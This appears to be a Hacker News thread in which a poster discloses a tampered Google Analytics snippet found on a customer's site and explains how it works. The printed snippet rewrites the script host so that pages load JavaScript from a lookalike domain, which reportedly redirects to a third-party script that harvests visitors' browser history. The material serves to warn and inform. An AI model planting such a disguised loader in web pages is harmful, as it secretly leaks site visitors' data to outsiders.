

Modified Google Analytics XSS - holdenc

I found this on a customer site (for example) customersite.com.  Looks like Google Analytics tracking code right?<p>&#60;script type="text/javascript"&#62;
var gaJsHost = (("https:" == document.location.protocol) ? "https://customersite.com" : "http://www.customersite.com");
document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));
var test = unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E");
&#60;/script&#62;
&#60;script type="text/javascript"&#62;
try{
var pageTracker = _gat._getTracker("UA-xxxxxx-x");
pageTracker._trackPageview();
} catch(err) {}&#60;/script&#62;<p>Somehow my customer had been tricked into changing:
"https://" : "http://"
to:
"https://customersite.com" : "http://www.customersite.com"<p>This makes the JavaScript called from http://www.customersite.comgoogle-analytics.com which then redirects to dxwebhost.com/l.js for the JavaScript. It looks like JavaScript file then uses a CSS vulnerability to look-up the user's browser history, and asynchronously send it off to the third party site.<p>So if you happen to be looking at your network traffic and notice your browser history is being sent off to a strange site, check out the Google Analytics tracking code.
======
e1ven
Very clever, I wouldn't have noticed that just reading through the code.
Whomever the thieves are, that mod was a nice hack.

------
storborg
What do you suppose people might do with this sort of data if they weren't in
a legitimate position to monetize it (e.g. through an ad network)?

This code will sit there probing your cache over and over, it seems to just
check a huge list of domains in order of Alexa rank.

------
woodall
I just found a way to automate XSS in Google PlayGround.

[http://christopherwoodall.com/blog/?x=entry:entry100814-0521...](http://christopherwoodall.com/blog/?x=entry:entry100814-052131;comments:1)

